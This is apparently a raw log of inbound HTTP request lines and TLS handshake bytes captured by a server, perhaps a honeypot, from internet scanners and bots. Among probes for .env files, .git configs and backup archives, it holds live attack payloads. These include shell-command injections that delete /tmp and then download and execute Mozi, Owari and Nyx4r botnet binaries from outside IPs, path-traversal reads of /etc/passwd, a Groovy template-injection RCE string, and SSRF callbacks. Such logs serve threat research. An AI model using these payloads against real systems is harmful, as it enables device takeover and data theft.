324	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03)\x96\xAC\xED
325	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xF62\x8D\xFC\x7F\x1F\xA1\x01\x82\xBE1\xA2\x22\xB5v\x98U\x0E\xC8\x80\xAAb\x5C\xCBx\xDD\xCA4L\xB2KC \xB0\x01#1\x09\x7F\xA30\xAF\xC8\x82\x87\x8E2Hrtkv\x8FP\x838\x17\x00N[\x15\x9Br\x0C
326	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03c\xB9(\xC2\x96\xA3qn\xEEG\x90\xDA6\x92\x16\xA2\xD6\xFF\x05\x07\x058k\xCFN\x85\x85\x9B\xEE\xB8\xB9\xF4 \x09\xCFq\x9Bk\xAE\x87\xB0\xCF\x82rw\x0EI\xF5\xBB\xB4\xD1d\xFBm\xA9\x83\xB8B@x]\xD2\x10\xB3\x12\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
327	1	\x16\x03\x01\x00\x8C\x01\x00\x00\x88\x03\x03’W\xEE\xDB$s8\x0E\x88\x84\xFB\x96\xB4\x8C\x005c\xAA\xDE\x8Bw\x0C\x82U?\xB1\x1C\x99y\x9F\xCB\x19\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
328	1	\x16\x03\x01\x05\xA8\x01\x00\x05\xA4\x03\x03\xFA\x8Db\x862\x12\x7FSBf\xCE\xF2\xC1\xE8\xE1Wd
329	1	GET /shell?cd+/tmp;rm+-rf+*;wget+ http://200.129.143.6/Binarys/Owari.arm;chmod+777+/tmp/Owari.arm;sh+/tmp/Owari.arm arm4.jaws HTTP/1.1
330	1	GET /Module1/js/Module_d845871a764a853ae06b7b557e432bf9.js HTTP/1.1
331	1	\x16\x03\x03\x01\xA7\x01\x00\x01\xA3\x03\x03\xA1#\xD1\xDD\xDF\x14\xC3\x17\x0F=$\xDE!\x9B\xD1
332	1	\x16\x03\x03\x01\xA7\x01\x00\x01\xA3\x03\x03@\x0F2\x9Cj72\xBC\xE2\xC4\x9B\x1C\x96?
333	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03{\xE9]Dg\xEA^Y\x9E\xE1\xDD\xB3E~\xB0\xC3\xF21\x9C\xB2\x86\x08\xF8l~\xA4\x85A\xF3e\xA8.\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
334	1	\x16\x03\x01\x05\xA8\x01\x00\x05\xA4\x03\x03\xE4\xF4\xB8g\x7F\xE5R\xE7\x05>\xBF.shv/\xD5hR\xEF&\x9F\x81\x22f\x1Em\xF7\xD0\xDF\xC8\x9A \xC9\xE3\x0E_s\xA3L\x14\x9F8
335	1	\x16\x03\x01\x00\xEA\x01\x00\x00\xE6\x03\x03\xC2\xAA\xA4/H\xF8~\x8Dt\xC3yU\xE9
336	1	\x16\x03\x01\x00\xEA\x01\x00\x00\xE6\x03\x03\xD3q\xCC7\xFAs\x1D.\x86\x82\xC5=+`\xD5\xA4\xF8P\x5Cu\xA9\xDC\xC5v\xE7\x1E@J\x97T\xB3! \xD7\xD8a\xFE\xD3\xE7F)\xE2\x09l\x07ma
337	1	\x16\x03\x01\x00\x8B\x01\x00\x00\x87\x03\x03\xD6\xFA\xD1\x86q\xFD\x8D \xA16\xEA@k\xAD\xDC\xD0\xB5\x15\xE5Y\xC0\xEB1\xF3\x84\xE36\xE5\xE2K\x16\x0E\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
338	1	\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\xE4\xCF\xCE&x\x5C#\xB0\xB5+\x82~O\x88D\xECV\xB6G\x06\x1D\xE2\xD7\x9D\xBC-\xB8\xED\xB4\x01u^ \xEF\x8DCx\xA0\xB2{7\xC2\xCB3\xE0&\x94*\xE45C\x0B\x8F\x99V\xFF\xAD\x05s&M\xC6\x0E\x5C\x0F\x00\xB6\x13\x02\x13\x03\x13\x01\xC0,\xC00\x00\xA3\x00\x9F\xCC\xA9\xCC\xA8\xCC\xAA\xC0\xAF\xC0\xAD\xC0\xA3\xC0\x9F\xC0]\xC0a\xC0W\xC0S\x00\xA7\xC0+\xC0/\x00\xA2\x00\x9E\xC0\xAE\xC0\xAC\xC0\xA2\xC0\x9E\xC0\x5C\xC0`\xC0V\xC0R\x00\xA6\xC0$\xC0(\x00k\x00j\xC0s\xC0w\x00\xC4\x00\xC3\x00m\x00\xC5\xC0#\xC0’\x00g\x00@\xC0r\xC0v\x00\xBE\x00\xBD\x00l\x00\xBF\xC0
339	1	\x16\x03\x03\x01\xA7\x01\x00\x01\xA3\x03\x03\x16\xF8\xE2\xCD\xAF\xD2\x0F\xE9
340	1	\x03\x00\x00.)\xE0\x00\x00\x00\x00\x00Cookie: mstshash=HWXFUSEW
341	1	\x16\x03\x03\x01\xA7\x01\x00\x01\xA3\x03\x03\xD2\xB1\xD4&\xFD\xDAv\xE3w&\xCE\x02\xFE\x0Ec\x9F\xCB\x12\xD1\x02\xF2\x89\x88\xD0d2 \xFB\x19X\xCC\xFB \x13\x8E,3\x1D\x1BH\xA0\xF6\xA4\xB63\x04\xAF\x02\xD9\x12\xEF2\xC9\x7Fc\xD9\xE7z\x16\xFFK\xC3\xD3\x22\xD8\x00\x8A\x00\x16\x003\x00g\xC0\x9E\xC0\xA2\x00\x9E\x009\x00k\xC0\x9F\xC0\xA3\x00\x9F\x00E\x00\xBE\x00\x88\x00\xC4\x00\x9A\xC0\x08\xC0\x09\xC0#\xC0\xAC\xC0\xAE\xC0+\xC0
342	1	\x16\x03\x03\x01\xA7\x01\x00\x01\xA3\x03\x03\xBB\xF9\x14t\xF4\xB0\xDA\x7F\xCD\xDE\x83\xD4-9,\xA2\x0F\x02-\x11>\xEB\xD2q\xEC\xEE\x8B\xEA?\xCC\x22
343	1	\x16\x03\x03\x01\xA7\x01\x00\x01\xA3\x03\x03\xC9[:\xFB\xBE\xA3\xB3_(C\x198\xF6\xDE.\x80\x7F1\x0E\xAC\xC0\xA5\x89g\xFDx \xDA6\xFA\x82\x83 \xB1\x8A\xA8\xFE\x1A\x10\x0E\xE0\xA1?\xBC\x8B\xE3\x0E\xA6\xE6\x22\xED\x9EB#\x83\xFD(\xD8\xE90_\xF6\x00\x01B\x00\x8A\x00\x16\x003\x00g\xC0\x9E\xC0\xA2\x00\x9E\x009\x00k\xC0\x9F\xC0\xA3\x00\x9F\x00E\x00\xBE\x00\x88\x00\xC4\x00\x9A\xC0\x08\xC0\x09\xC0#\xC0\xAC\xC0\xAE\xC0+\xC0
344	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03@\xFD00\xCB\xDC\xF9\xC6\xAE\xC82’T\xE2\xA7U\xF0\xAE:\xCF\xB6\xCFG5\xB8\x0F\xDC\xDC\x95\xF6\xE5\xD4\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
345	1	\x16\x03\x01\x00\xE2\x01\x00\x00\xDE\x03\x03\x95\xD8bsE1L\xCA.\xA1\xBD\xAC\xF7\xC9\xCBB\xC7\xBE\xCDOR\xF8r\xE0\x1B\xBE\xFFE\x9F3\xA5\x19 <\xEFy\x940\x5C\xD6\xB9\xD5u5\xABS\x8C\x1C\xCF\x00\x91’\x8D\xE5\xDB.Oc\xF7\xA7\x83\xAARua\x00\x1A\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
346	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03m:.yP,tS\x97\x15
347	1	\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03\xD3z\xB5:\xBCU2U\x1E\xE2\x15dWqC\xE8n\x0Ek`\xD7\x86\x1C3\xB5’\xF2v\xC2{5\xE5\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0’\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
348	1	\x16\x03\x01\x00\x8A\x01\x00\x00\x86\x03\x03Pu\x88d7?\x0B\xA7eS.\xBAk\xE7g\x03u\x80!\xBE$\x9Ciu\xA2T\x8Eh\xD9Lgl\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
349	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03C\x95\x87G\x08D\x16\xB64\x9D}
350	1	\x16\x03\x01\x00\xAC\x01\x00\x00\xA8\x03\x03\xE5\x10\xF3y*z&\x87t\x05\xABj\x06pH^\x89h9:\xD8\xF0_a[\xEB~\xA3>d\x09\x1F\x00\x008\xC0,\xC0
351	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03qp\x87\x0C\xDFuWb\xE9_\x99\xAF.n5\xA6?c{r\x11{5\xDA~\xCA\x02\xAA*y\xE2\x91\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
352	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xB0*\xA6\xA4\x90\xCA4\xF4\xB95&\x0F\xFE\x94\xE8\x04 kU\xEF\xC5\x06X\xE8\x0F\x9C.\x03\xF2Mo1\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
353	1	\x16\x03\x01\x00\xEA\x01\x00\x00\xE6\x03\x03\xCA\xD44:\x14\xC5sn\x89\xF5\x8D\xCE\x19\x0FS\xE2v\xF8{\xD2\x05\x8C\x1C\xBF\xA7K\xE2\xAA\xBC\x93w\x9F \xB7y\xD81\xED
354	1	GET /socket.io/1/?t=1742451740651 HTTP/1.1
355	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xF6\x1D\x18m\x04\xEBD^\xED\xAB\xAC\xC9\x9C\x7F\xB9 o\xFE0T+4Q\xF1\x96\xFB\xC6\x80\xBB\x1B\xDA\xC3 ~\xC8\x8A\x85\x7F\x97&y]\x1C\x18\xE9\x18\x85\xFDD\x22`\x1A\xAD\x08J\x84l
356	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x14\xDB\xAB\xD4\x8D\xB4’\x10\xD4\xFD\xED\xCAo
357	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xEAj\xA3yfM\x15;\x8B\xDB\xCA\xA5{\x13A2\xF1\x9E\xFFe\xD2/\x00y\x1D\x8DRG#\xE46\x87 \xC0s4\x88\xA1\xB6\xC5\xBAEd\xA2\xCE\x8B\xCDc\x10v}\xCF\x22\xCCT\xA5\xCF\x8C\xB0\xA6\xA3l\xBEY\x16\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
358	1	GET /js/protocol.js HTTP/1.1
359	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x84QD\xE4\xBBn\x11F\x15\x9B\x07\x0C\xCC\xD4\x15>Z\x1B\x8F_\x98\xD7Ha\xAB\xAE\xD5\x13*@X\xC0\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
360	1	GET /zd/mips HTTP/1.1
361	1	GET /zd/arc HTTP/1.1
362	1	GET /zd/i686 HTTP/1.1
363	1	GET /zd/mpsl HTTP/1.1
364	1	GET /zd/sh4 HTTP/1.1
365	1	GET /bin.sh HTTP/1.1
366	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xDF]\x22\x92\x02.\x98\x9FB\x1Ao\xE0j\xC6\x86\x82)\xBE
367	1	GET /socket.io/1/?t=1742452491326 HTTP/1.1
368	1	GET /bins/ppc HTTP/1.1
369	1	GET /bins/spc HTTP/1.1
370	1	GET /bins/mpsl HTTP/1.1
371	1	GET /bins/x86 HTTP/1.1
372	1	GET /bins/sh4 HTTP/1.1
373	1	\x16\x03\x01\x00\xAC\x01\x00\x00\xA8\x03\x033\xAE\x85f\xBA\x81\xDC\xE1\x950
374	1	\x16\x03\x01\x00\xF2\x01\x00\x00\xEE\x03\x03\xB8\x9Cs\xD2V\xCE\xD5\x02\x8E7\xC3\xAEVR\x9A\xD7\xE4\xC6\xF7lH\xF16\xBC\x1D\xA4H\x0E\xD1\xED\x98\xAD )\x8ER;\x22{\x01\x88\x91gR\xD3\xA0\xE3\xE61
375	1	GET /shell?cd+/tmp;rm+-rf+*;wget+ http://157.245.200.182/Binarys/Nyx4r.arm;chmod+777+/tmp/Nyx4r.arm;sh+/tmp/Nyx4r.arm arm4.jaws HTTP/1.1
376	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x98\xD4Kc\xC1\xDC\x09!\xA9\x05\x90\xE3\xF1a\xA6p\xF9\xA0\xB0\xC6F`W\xE7\xB1h\x93\xAA\x95\xF4\xB3\xAE\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
377	1	GET /xmldata?item=all HTTP/1.1
378	1	GET /main_arm HTTP/1.1
379	1	GET /main_m68k HTTP/1.1
380	1	\x16\x03\x01\x05\xA8\x01\x00\x05\xA4\x03\x03’
381	1	GET /.env.debug HTTP/1.1
382	1	GET /nabppc HTTP/1.1
383	1	GET /socket.io/1/?t=1742467167137 HTTP/1.1
384	1	GET /socket.io/1/?t=1742467154650 HTTP/1.1
385	1	\x16\x03\x01\x00\xF2\x01\x00\x00\xEE\x03\x03\x96\x05]{\x13T\x94t\xE4.\xDA\x09N\xFAa\xB9\xC1F\xB2\xE8\x1E\x9B_4\xD2\xBA\xCE\xC7\xB9h\xA9\x9B \x1E\xECW?)\x01e\xBD\x18\xD9\xDE\x14)\xCD\xB0NA?\x84\xECnO\x22\xC5\x9DO\xB5vCm\xEDA\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
386	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x06\xAA,\xEDI\xA7M\x0F\xB6V\xE4\x17\xA9\xD4\xA0\xF8Bc4hFy\x83s\xF2\x9EZ\x02\xD3>\xB7\x0B\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
387	1	GET /jklm68k HTTP/1.1
388	1	GET /nabm68k HTTP/1.1
389	1	GET /app/config/.git/config HTTP/1.1
390	1	GET /data/config/.git/config HTTP/1.1
391	1	GET /m68k HTTP/1.1
392	1	GET /arm5 HTTP/1.1
393	1	GET /spc HTTP/1.1
394	1	\x16\x03\x03\x01\xA6\x01\x00\x01\xA2\x03\x032\xF8\x0B\xA8H\xC23\xA9\x19\x0F\x12\xFA\xDC \xBD\xD9-*6\x8B\x03\xFE\x92\x86GvO6~\xF4O2 7\xE1\xF1\x9D\x17>B\xF4\x1Fg\xC4\xE6\xDB\xB2\xE9\x94\x83\x83\xB4\xC1:\x0C\xD0\x22G\xDE7\xF7\xFFm\xD4\xEC\x00\x8A\x00\x16\x003\x00g\xC0\x9E\xC0\xA2\x00\x9E\x009\x00k\xC0\x9F\xC0\xA3\x00\x9F\x00E\x00\xBE\x00\x88\x00\xC4\x00\x9A\xC0\x08\xC0\x09\xC0#\xC0\xAC\xC0\xAE\xC0+\xC0
395	1	\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03G\xBFv&\x0B\xC2Y\xC8\x88M,\x90\x1ER\x07\xBA\x9F\xDB\x03+=R\xCD\x8F\xC4\xF0\xFF\xC1y\xD0\xB3\xF0 yV\x9B\x95\xA6\xAF!\xDC\xECE\xF2\x86\xDC
396	1	\x16\x03\x03\x01\xA6\x01\x00\x01\xA2\x03\x03>\xB1M\xE4d\x136A\xFE\xE0\x00\x9Do\xCB\xDD~
397	1	GET /.env.orig HTTP/1.1
398	1	GET /t/ppc HTTP/1.1
399	1	GET /t/aarch64 HTTP/1.1
400	1	GET /static/files/.git/config HTTP/1.1
401	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x12\xE3\xED\xD5\xCC\xD9H\x9A\xF4\x00\x7F\xCF\x08\xA55j.j\xD0\xFEb\xE0\xEF\x82\xFF;*#\x84\xE8\xFB\x06 \x95jY\xC9\x19q-\xC0\xE8#\xAA\x15\xC4Ol\xDD\x18bY\xBA\xAF\x10\xB7\xE5\x96\x9B\xC0\x95\xACrq\xFB\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
402	1	\x16\x03\x01\x00\xAC\x01\x00\x00\xA8\x03\x03
403	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x03\x9Asd\xFD\xF9\xEF})9\xF3\xA7b)\xBF\x9C\x13\x1E\x8E\x08\xB7\xFAf?\x027\xC3\x07\xF1<\xBFe \xDA\xD1\xA5\xCC\xF9\xDE\xBC.\xD76\xAE\x0E+\xAC\x11gn\xB9\xD0\x91\x8D
404	1	\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03\x1E [_ \xBF\xB7K\x9D\x027,_c\x02\xF0\xAD\xBE\x1A\xC3\xF3\xD6\xE4B\x92\xEE\xFA9\xB3t\x9B\x9C\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0’\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
405	1	\x16\x03\x01\x05\xA8\x01\x00\x05\xA4\x03\x03\xBB\x83\xC3\x1F3VRw\xEF\xC1\xAA\xBCz)\x09Z=r\xDB\x00/\xCA\xA6
406	1	GET /system/config_menu.htm HTTP/1.1
407	1	GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
408	1	GET /Admin/Admin.aspx HTTP/1.1
409	1	POST /clients/MyCRL HTTP/1.1
410	1	GET /classes/common/busiFacade.php HTTP/1.1
411	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xEDGT1\x97n\xAC\x9CN\xB8\xFCm\xBB\xAD.\x0CB\xA3\xA6\xAA\xB4!XK\x81\x22\x11q\xE6\xE7\xC3\x80\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
412	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x83\xC7\xCDv\xB7C\xBB\x0E\x15\xAA}lz\x88\x22f=\x12u\x22\x1D\xE9\xD2\xCFHy\xFC\xC0\xC0\x02\xC5^\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
413	1	\x16\x03\x01\x00\x8B\x01\x00\x00\x87\x03\x03$P\xCB\xE9\x17\xF0K\xE58\xD7N3UP\x10\xBA<s\xC9X\xEB\xA6\x99\xA6\x88z\xA2\x82z\xDEWg\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
414	1	GET /GRWm HTTP/1.1
415	1	GET /cDqD HTTP/1.1
416	1	\x16\x03\x01\x00\xFA\x01\x00\x00\xF6\x03\x03\x0B\xBC\x85\x04&?\x02K\x18
417	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03j\xB1,\xA8\x81\x11VE\xF3\xD1\xCEp\x98\x0CZ.\xA5\xAE\x8C\x1A\xC3$\x95\x97\x04\x9BP\x87:T\xF0\xB6 \xA3#;\x00\x02\x89\xA4.\x97Z\x1A-\x12SS\xDD$/\x9C\xD4\x87f\x81k\x16\xD3\xF7\x83\x12\xAB\xD3I\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
418	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03Z\x92\xBC\x1B\xD5\x8A\x85\x22\x93\xB5S\xAA\x8F\x19\xB6h\xEA\xAB\xBE\xCE*\xA2j\x8C\xC0\xAB\xE0\xF2 ]-\xCB\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
419	1	GET /data.tar.gz HTTP/1.1
420	1	\x16\x03\x03\x01\xA6\x01\x00\x01\xA2\x03\x033\x10\xA5qZ47\xBBY\xCDp\xB0\x1D\xE8\x11n\x8F\x80\x9F\xB94\x08\xF1\xB9\xC4\xF8\x9D\x10\xDB=#\x5C \xA39\xF3\xB7\xD3k\x7F\x06\xA4\x06f\xE3r\x8A\xAD\x86\xAD\x04
421	1	\x16\x03\x03\x01\xA6\x01\x00\x01\xA2\x03\x03\x0C\xEF\x19\xD3\xAD/\x9Aa
422	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xDCPA\x15Q?\x06\xDD\x91v\x1EJ\x18i\xD4e\x1Dt\x0C1\xBD\x7F\xD49\x9Av\xC8\xD1Q\xD1LG \x8A\xE2\xCA\xD6w\xD0\x1E\xAF9}\xA5\xD3\xCAk\x98\x8F\xD0s:c\xB3k`\xE5O\x93\xF0\x8FU$\x95\xFE\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
423	1	\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03`\xDC'\xDE\xD6\x81D\xD0\xE6\x12\x14\x17To\xB3n$\xF6\xAE\xEEQQ\x8D\xA8\xD2\xE7\x86\xEA\x13H\xE7\x97 \xFE\xEB\xE4l\xF6^\x13-+_\xE0~\x025@#%ud3\xC7\xA5\xA8\x93\x8A\x17o\x1FP%i3\x00\xAE\x13\x02\x13\x03\x13\x01\xC0,\xC00\x00\xA3\x00\x9F\xCC\xA9\xCC\xA8\xCC\xAA\xC0\xAF\xC0\xAD\xC0\xA3\xC0\x9F\xC0]\xC0a\xC0W\xC0S\x00\xA7\xC0+\xC0/\x00\xA2\x00\x9E\xC0\xAE\xC0\xAC\xC0\xA2\xC0\x9E\xC0\x5C\xC0`\xC0V\xC0R\x00\xA6\xC0$\xC0(\x00k\x00j\xC0s\xC0w\x00\xC4\x00\xC3\x00m\x00\xC5\xC0#\xC0’\x00g\x00@\xC0r\xC0v\x00\xBE\x00\xBD\x00l\x00\xBF\xC0
424	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03 i\xFF\xAD
425	1	GET /__screenshot-error?file=/etc/passwd HTTP/1.1
426	1	GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1
427	1	GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27 HTTP/1.1
428	1	GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1
429	1	POST /classes/common/busiFacade.php HTTP/1.1
430	1	GET /php/ztp_gate.php/.js.map HTTP/1.1
431	1	GET /file=c:%5Cwindows%5Cwin.ini HTTP/1.1
432	1	GET /file=/etc/passwd HTTP/1.1
433	1	GET /interview?i=/etc/passwd HTTP/1.1
434	1	GET /device/config HTTP/1.1
435	1	GET /bin/bin.gz HTTP/1.1
436	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03E\x10\x11\x87d.\xE5\x8EK\x11\x93\x04\xE4N\x12\xE1\xF1D\x09\xF0\xED763\x1E:\xE9n\x01\xFE\xC1\x00 \x92\x05\x0Bl_\x8D$\x9D\x98\x85J\x9CC\x84\xDB\x05\xE5\x9DC\xAE\xA5\xBD\xC7\xC6\x03l\xE3\xD7\xC4_\xF2*\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
437	1	GET /render/info.html HTTP/1.1
438	1	GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1
439	1	GET /access/set?param=enableapi&value=1 HTTP/1.1
440	1	GET /cslu/v1/scheduler/jobs HTTP/1.1
441	1	POST /task/submit/ HTTP/1.1
442	1	GET /filex/read-raw?url=http://oast.me&cut=1 HTTP/1.1
443	1	GET /file=http://oast.pro HTTP/1.1
444	1	GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
445	1	POST /index.php/display/status_zigbee HTTP/1.1
446	1	GET /api/v1/markdown/link:metadata?link=http://localhost:13042 HTTP/1.1
447	1	GET /bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20 HTTP/1.1
448	1	GET /unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css HTTP/1.1
449	1	GET /xxx.xxx.xxx.xxx.tar.gz HTTP/1.1
450	1	GET /old.tar.gz HTTP/1.1
451	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03_\x9B\x8C\x14\x09c\xF8N{0\x1E!s\xA9K\x96\xC8\x89\x85\xEA\xA4\xE4Uw\xEEE\x9F~\x8A{\x1E7 \xB7\xA1\xC8\x11\x95\xC2\xE6\xE2\x90\xEB\x1A\xEAwM2\x95\x88.$\x83n\x19\xCD\x1F\xDE\x8F\xFD\xE4\x88\xA6\xDB\xBE\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
452	1	GET /upload.tar.gz HTTP/1.1
453	1	GET /bin/bin.tar.gz HTTP/1.1
454	1	GET /web.config.tar.gz HTTP/1.1
455	1	GET /portal.tar.gz HTTP/1.1
456	1	GET /source.tar.gz HTTP/1.1
457	1	GET /src.tar.gz HTTP/1.1
458	1	GET /bin.tar.gz HTTP/1.1
459	1	GET /html.tar.gz HTTP/1.1
460	1	GET /www.tar.gz HTTP/1.1
461	1	GET /web.tar.gz HTTP/1.1
462	1	GET /backup.tar.gz HTTP/1.1
463	1	GET /xxx.xxx.xxx.xxx.gz HTTP/1.1
464	1	GET /old.gz HTTP/1.1
465	1	GET /data.gz HTTP/1.1
466	1	GET /upload.gz HTTP/1.1
467	1	GET /web.config.gz HTTP/1.1
468	1	GET /portal.gz HTTP/1.1
469	1	GET /source.gz HTTP/1.1
470	1	GET /src.gz HTTP/1.1
471	1	GET /bin.gz HTTP/1.1
472	1	GET /html.gz HTTP/1.1
473	1	GET /www.gz HTTP/1.1
474	1	GET /web.gz HTTP/1.1
475	1	GET /backup.gz HTTP/1.1
476	1	GET /xxx.xxx.xxx.xxx.tar HTTP/1.1
477	1	GET /old.tar HTTP/1.1
478	1	GET /data.tar HTTP/1.1
479	1	GET /upload.tar HTTP/1.1
480	1	GET /bin/bin.tar HTTP/1.1
481	1	GET /web.config.tar HTTP/1.1
482	1	GET /portal.tar HTTP/1.1
483	1	GET /public_html/.env HTTP/1.1
484	1	GET /api/v2/.env HTTP/1.1
485	1	GET /project/.env HTTP/1.1
486	1	\x16\x03\x01\x00\xAC\x01\x00\x00\xA8\x03\x03@\xC04\xE6\x9D;\x89\x11m\x91\xCB\x95\xA5\x1F\x8B,U,\xEF3\xD8\x17\x9E\x91\xDF\x90\x94w\x08\x01n\xBE\x00\x008\xC0,\xC0
487	1	GET /shell?cd+/tmp;rm+-rf+*;wget+http://180.106.105.231:44989/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
488	1	GET /backend/src/.env HTTP/1.1
489	1	GET /sample.env HTTP/1.1
490	1	GET /phpinfos/ HTTP/1.1
491	1	GET /cms/.env.prod HTTP/1.1
492	1	GET /.env~ HTTP/1.1
493	1	GET /admincp/.env HTTP/1.1
494	1	GET /security/.env HTTP/1.1
495	1	GET /html.tar HTTP/1.1
496	1	GET /www.tar HTTP/1.1
497	1	GET /web.tar HTTP/1.1
498	1	GET /backup.tar HTTP/1.1
499	1	GET /xxx.xxx.xxx.xxx.7z HTTP/1.1
500	1	GET /old.7z HTTP/1.1
501	1	GET /data.7z HTTP/1.1
502	1	GET /upload.7z HTTP/1.1
503	1	GET /bin/bin.7z HTTP/1.1
504	1	GET /web.config.7z HTTP/1.1
505	1	GET /portal.7z HTTP/1.1
506	1	GET /source.7z HTTP/1.1
507	1	GET /src.7z HTTP/1.1
508	1	GET /downloads/.env HTTP/1.1
509	1	GET /products/.env HTTP/1.1
510	1	GET /xxx.xxx.xxx.xxx.rar HTTP/1.1
511	1	GET /old.rar HTTP/1.1
512	1	GET /data.rar HTTP/1.1
513	1	GET /upload.rar HTTP/1.1
514	1	GET /bin/bin.rar HTTP/1.1
515	1	GET /web.config.rar HTTP/1.1
516	1	GET /portal.rar HTTP/1.1
517	1	GET /source.rar HTTP/1.1
518	1	GET /src.rar HTTP/1.1
519	1	GET /bin.rar HTTP/1.1
520	1	GET /html.rar HTTP/1.1
521	1	\x16\x03\x01\x00\xAC\x01\x00\x00\xA8\x03\x03\x8D>\xEDf\x96(bX\xFE\x8D\x00\xBB\xCB\xA9\xD3\xCB.\x86\xF9-}\x07\xA4\x18\xC8\xF5=0Q{r\xF0\x00\x008\xC0,\xC0
522	1	GET /source.tar HTTP/1.1
523	1	GET /src.tar HTTP/1.1
524	1	GET /bin.tar HTTP/1.1
525	1	GET /upload.zip HTTP/1.1
526	1	GET /bin/bin.zip HTTP/1.1
527	1	GET /web.config.zip HTTP/1.1
528	1	GET /portal.zip HTTP/1.1
529	1	GET /source.zip HTTP/1.1
530	1	GET /src.zip HTTP/1.1
531	1	GET /bin.zip HTTP/1.1
